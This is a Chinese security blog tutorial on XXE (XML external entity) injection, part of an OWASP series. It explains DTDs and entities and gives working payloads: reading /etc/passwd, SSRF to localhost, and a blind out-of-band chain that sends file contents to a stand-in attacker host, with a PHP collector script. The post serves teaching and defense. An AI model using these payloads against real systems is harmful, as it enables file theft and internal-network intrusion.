带xml头的字符串转实体_德慎思信息安全-OWASP 系列之XML注入

最新推荐文章于 2023-01-02 19:24:48 发布
最新推荐文章于 2023-01-02 19:24:48 发布
阅读量97 收藏
点赞数
文章标签: 带xml头的字符串转实体
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33821888/article/details/113329259
版权

德慎思信息安全-OWASP 系列之XML注入

摘要

前面系列我们介绍了命令注入漏洞中的常见的 SQL 注入漏洞,下面开始本系列中的 XML 注入漏洞介绍。

XML injection

其实应该称为 XML external entity injection (缩写 XXE),XML 外部实体注入。

影响

通过恶意请求访问服务顺的敏感数据,还可以搭配 SSRF 攻击内网造成文件泄露。

漏洞原理

许多网站通过 XML 格式文件来进行数据传输,而后端使用的程序,在对 XML 文件解析处理时启用了部分危险的功能,可能就会造成 XXE 攻击。

漏洞相关概念

XML Extensible Markup Language

可扩展标记语言是一种标记语言,被设计用来结构化、存储和传输数据。标记指计算机拨通理解的信息符号,通过此种标记,计算机之间可以处理包含各种信息文章等。

XML 与 HTML 类似由元素标记、属性、值组成的(逻辑上)树结构的文本文件

一个合法的 XML 文件

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE note SYSTEM "Note.dtd">  
<note>
    <to>Tove</to>
    <from>Jani</from>
    <heading>Reminder</heading>
    <body>Don't forget me this weekend!</body>
</note>

DTD

在上面文件实例中,

  • DOCTYPE 声明行是“合法”的XML的一部分
  • DOCTYPE 声明行称为 Document Type Definition DTD,即文档类型定义
  • DTD 的目的是定义 XML 文档的结构。
  • DTD 可被成行的声明于 XML 文档中,也可作为一个外部引用
  • 上例中DOCTYPE 声明是对外部 DTD 文件的引用。下面是这个文件的内容
<!DOCTYPE note
[
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>

DTD 类型

对于上面一段讲的 DTD ,有两种类型

内部 DTD
	<!DOCTYPE 根元素 [元素声明]>

外部 DTD
	<!DOCTYPE 根元素 SYSTEM "存放元素声明的文件的URI,可以是本地文件或网络文件" [可选的元素声明]>
	<!DOCTYPE 根元素 PUBLIC "PUBLIC_ID DTD的名称" "外部DTD文件的URI">

Entity

XML 1.0 标准定义了 XML 文档结构,同时也定义了 Entity 实体的概念,即某种类型的存储单元。

实体是用于定义引用普通文件或者特殊字符的快捷方式的变量。

  • 实体引用是对实体的引用
  • 实体可在内部或者外部进行声明

我们可以在元素声明中自定义实体,和 DTD 类型类似也分为

  • 内部实体
  • 外部实体
  • 此外还有普通实体、参数实体、预定义实体
声明:
<!DOCTYPE 根元素 [<!ENTITY 内部普通实体名 "实体所代表的字符串">]>
<!DOCTYPE 根元素 [<!ENTITY 外部普通实体名 SYSTEM "外部实体的URI">]>
<!DOCTYPE 根元素 [<!ENTITY % 内部参数实体名 "实体所代表的字符串">]>
<!DOCTYPE 根元素 [<!ENTITY % 外部参数实体名 SYSTEM "外部实体的URI">]>
除了 SYSTEM关键字外,外部实体还可用 PUBLIC关键字声明。


引用:
//经实验,普通实体既可以在 DTD中,也可以在 XML中引用,可以在声明前引用,可以在在元素声明内部引用
&普通实体名; 

//经实验,参数实体只能在 DTD中引用,不能在声明前引用,不能在元素声明内部引用
%参数实体名;

一个内部实体的例子

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE game [
	<!ELEMENT game (lol, dota, dnf)>
	<!ELEMENT lol (#PCDATA)> //#PCDATA Parsed Character Data代表的是可解析的字符数据,即字符串
	<!ELEMENT dota (#PCDATA)>
	<!ELEMENT dnf (#PCDATA)>

]>  
<game>
	<lol>a</lol>
	<dota>b</dota>
	<dnf>c</dota>
</game>

一个外部实体的例子

exmaple.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE game SYSTEM "LOL.dtd"> // 由 SYSTEM 定义外部实体
<game>
	<lol>a</lol>
	<dota>b</dota>
	<dnf>c</dota>
</game>

LOL.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ELEMENT game (lol, dota, dnf)>
<!ELEMENT lol (#PCDATA)>
<!ELEMENT dota (#PCDATA)>
<!ELEMENT dnf (#PCDATA)>

对于外部实体,有

  • SYSTEM
  • PUBLIC

两个关键字来定义,表示实体来自本地计算机还是公共计算机,外部实体的引用还可以利用如下协议

file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

注意:不同语言的 XML 解析库,对外部实体的引用协议支持不同

漏洞利用

XXE 攻击类型

  • 敏感数据文件内容泄露
  • 搭配 SSRF 攻击
  • XXE 盲注
    • 之带外攻击(out-of-band)
    • 通过报错泄露数据

第一种:敏感数据文件内容泄露

攻击方式,通过外部实体定义引用 XML 文件外部的文件

<?xml version="1.0"?>
<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &b;             // 引用实体b, 值为 /etc/passwd 的内容
    </productId>
</stockCheck>

在线实验

https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

第二种:搭配 SSRF 攻击

攻击方式,通过外部裸体定义引用服务器内网的网址实体

<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY b SYSTEM "http://127.0.0.1:8088/"> ]>
<stockCheck>
    <productId>
        &b;
    </productId>
</stockCheck>

在线实验

https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

第三种:XXE 盲注

如果应用程序没有回显,即XXE 盲注;我们考虑利用带外攻击方式获取数据

XXE 盲注主要使用了 DTD 约束中的参数实体和内部实体

  • 参数实体:是一种只能在 DTD 中定义和使用的裸体,一般引用时使用%作为前缀
  • 内部实体:是指在一个实体中定义的另一个实体,也就是嵌套定义

有如下文件

攻击者服务器上有文件 test.php

<?php
  file_put_contents("test.txt", $_GET['file']);  
?>

攻击者服务器上有文件 test.xml (内部的%号要进行实体编码成&#x25)

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://攻击者ip/test.php?file=%file;'>">
%all;

目标机上有文件 testXML.php

<?php 
$xml=<<<EOF
<?xml version="1.0"?> 
<!DOCTYPE ANY[ 
<!ENTITY % file SYSTEM "file:///C:/Users/LiuSir/Desktop/test.txt">     // 读取受害者机上的test.txt
<!ENTITY % remote SYSTEM "http://攻击者ip/test.dtd"> 
%remote;
%send;
]> 
EOF;
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
// print_r($data);
?>

// 注意两个EOF后面不能有空格

攻击的流程是,当访问目标的 http://example.com/testXML.php 时,目标机会读取 C:/Users/LiuSir/Desktop/test.txt 的内容,并发送到攻击者服务器上的 test.php 文件,然后 test.php 会读取数据并保存在本地的 test.txt 中,完成攻击。

攻击后获取的数据

c55f162dd33c13e52f0c0abbb1fbe871.png

漏洞防护

在程序的 XML 解析库中禁用外部实体的解析

参考

https://www.w3cschool.cn/xml/xml-dtd.html

https://www.w3.org/TR/2008/REC-xml-20081126/

https://whoamianony.top/2020/10/10/ctf/xxe-lou-dong-xue-xi-zong-jie/

皮皮波
关注
OWASP之XXE(XML外部实体注入
zzhokok的博客
08-14 457
libxml版本2.9.1之前,不包含2.9.1 使用phpinfo()查看libxml的版本信息 XML文档 组成:xml声明,DTD部分,xml部分 DTD知识 XXE利用 实战-bwapp-火狐-burp
任意XML实体实体XML 方法 JAVA
09-28
XML 节点名称 要与Bean相同 该项目 包含测试代码 可以演示。 节点属性 可以为String 多层节点 请用List表示
Annotation Injection & XML Injection
qq_39404375的博客
01-18 349
Annotation Injection & XML Injection1. Which is better?I find some information in the official reference to explain this question, here is the screenshot:In conclusion, it depends. However, there is a
【网络安全】OWASP 十大网站安全风险 (一): 注入攻击
baidu_41678158的博客
01-02 339
OWASP是 open web application security project 的缩写。这个系列主要介绍这十个最多被攻击的安全漏洞。
XML注入:理论篇--定义、原因、防御
WEL测试
11-30 1208
什么是XML注入漏洞 XML injection(XML注入漏洞),该漏洞类似SQL注入XML文件一般用作存储数据及配置,如果在修改或新增数据时,没有对用户可控数据做义,直接输入或输出数据,都将导致xml注入漏洞。 XML注入产生的原因 XML注入产生的原因与SQL注入差不多,主要包含以下两个: 传输的数据包含了标签内容 修改数据时会覆盖原有的标签 XML注入漏洞例子 服务器是生成XML来存储用户数据,示例如下: <?xml version="1.0" encoding="UTF-8"?&gt
慎思信息安全-OWASP 系列注入漏洞(上)
weixin_50763496的博客
12-18 390
OWASP 系列注入漏洞(下) 摘要 上一期,我们介绍了注入漏洞中常见的 SQL 注入漏洞,主要内容是以 MySQL 为例介绍了 SQL注入的基本原理,并举例了几个常见的注入手法与原理。本期我们来介绍其他的一些注入手法与原理、 SQL injection 接上期 检查数据库信息 检查数据库类型与版本 我们习惯上简称为数据库管理系统为数据库,对于数据库管理系统来说分很多类型,每一种查询方法都不一样。 常见的数据库类型有 Microsoft MySQL Oracle PostgreSQL 不同数据库的查询
慎思信息安全OWASP系列OWASP TOP 10
weixin_50763496的博客
12-04 367
OWASP系列OWASP TOP 10 介绍 在信息安全中渗透测试方向,OWASP TOP 10 是渗透测试人员必须要深入了解和学习的,今天我们来深入了解和学习下 OWASP 发布的以往最重要的两个版本,研究下我们 IT 行业从业人员最容易引入的漏洞,后续文章会更新具体的漏洞原因、场景、防护手段,提升我们的应用抗风险能力。 应用程序安全风险 攻击者可以通过应用程序中许多的不同的路径方式去危害企业业务。每种路径方法都代表了一种风险,这些风险都值得关注。 [外链图片存失败,源站可能有防盗链机制,建议将图片
慎思笃行”系列报告(十一):如何应对“逆全球化”下的滞胀?.pdf
04-15
慎思笃行”系列报告(十一):如何应对“逆全球化”下的滞胀?.pdf
慎思笃行”系列报告(三_):稳增长右侧,价值成长如何选择?.pdf
02-20
慎思笃行”系列报告(三_):稳增长右侧,价值成长如何选择?.pdf
solidworks2020URDF文件插件sw2urdfSetup-V1.6.0
最新发布
03-20
本sw2urdfSetup.exe版本v1.6.0适用于windows下的solidworks2020版本。 各版本对应关系如下: v1.6.1 (SolidWorks 2021) v1.6.0 (SolidWorks 2020) 1.5.1 (SolidWorks 2019 and 2018 SP 5)
XML注入漏洞
武天旭的博客
10-05 1967
一、漏洞描述 XML外部实体注入攻击,无论是WEB程序,还是PC程序,只要处理用户可控的XML都可能存在危害极大的XXE漏洞,开发人员在处理XML时需谨慎,在用户可控的XML数据里禁止引用外部实体
《Web漏洞防护》读书笔记——第6章,XXE防护
jexsen的博客
04-07 544
《Web漏洞防护》读书笔记——第6章,XXE防护 XXE介绍 XXE漏洞是指由于在XML文件中注入了外部实体而造成的攻击。 XML介绍:XML是一种用于标记电子文件并使其具有结构性的可扩展标记语言。 由以下几个元素所组成: XML声明,DTD(跟在XML声明后,程序既可以在内部声明DTD,也可以引用外部的DTD文件),实体(需要在DTD内进行声明,分为内部声明实体、外部引用实体),根元素(XML文件有且仅有一个根元素,可以自定义根元素),元素(XML文件的主体内容,也可以成为XML代码),注释(使用格式进
XML 文件换为 String 字符串
weixin_30606669的博客
08-12 3558
using System.Xml;//------------------------------string xmlFile = Server.MapPath(@"files.xml");XmlDocument xmlDoc = new XmlDocument();xmlDoc.Load(xmlFile);string xmlStr = xmlDoc.OuterXml;TextBox1.Te...
XML/DTD基本用法 DTD禁用的解决方法
heartOfblack 离开了电脑,我不希望我还有病
07-26 1万+
XML和DTD(DTD一般用于某些比较特殊而且固定的行业,使用它是为了规范和硬性规定) (XML常用于一些经常调用的常量且其值并非涉及到安全性的问题,比如游戏中很多参数,怪物的等级,属性,物品的属性等一般使用XML来定义,因为它的数据量特别大,放在数据库的话对数据库的负担较大,而且这些游戏数据只需要在开始的时候加载一次就可以了。所以更适合使用XML来完成,,而DTD文件则可以说是XML的一个模板(
字符串xml格式之间的
weixin_39513166的博客
12-02 5009
字符串xml格式互相换(以字符串换的方式创建): public static void main(String[] args){ String str = ""; str = "" + "" + "" + "1" + "2"
xml内容化为String
热门推荐
xclsky的博客
01-08 2万+
1 dom4j中的Document有一个方法。asXML()。该方法是将xml文件内容化为字符串。 如:SAXReader saxReader=new SAXReader(); Document document; String xmlString=""; try { document = saxReader.read(new File(xmlFileName)); xmlStrin
xml实体互相
代码缔造者的博客
08-11 2962
我们在请求国家系统经常会遇到webservice 接口他们一般传输使用xml 所以使用xml就会遇到和实体接互相换以及实体xml 不对应怎么处理。接下来提供一种解决方案 他可以处理xml实体随意换! 建立实体(模拟发票实体) package com.dairuijie.test.bean; import java.util.List; import com.thoughtwo...
C++面向对象程序设计:从字符串变量到专业技能培养
建议学生保持专注,广泛阅读,深入钻研,制定学习目标和计划,并对学习对象有深刻的理解,遵循"博学之,审问之,慎思之,明辨之,笃行之"的学习原则。 通过系统学习和实践,学生将能够在C++编程中熟练运用字符串...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值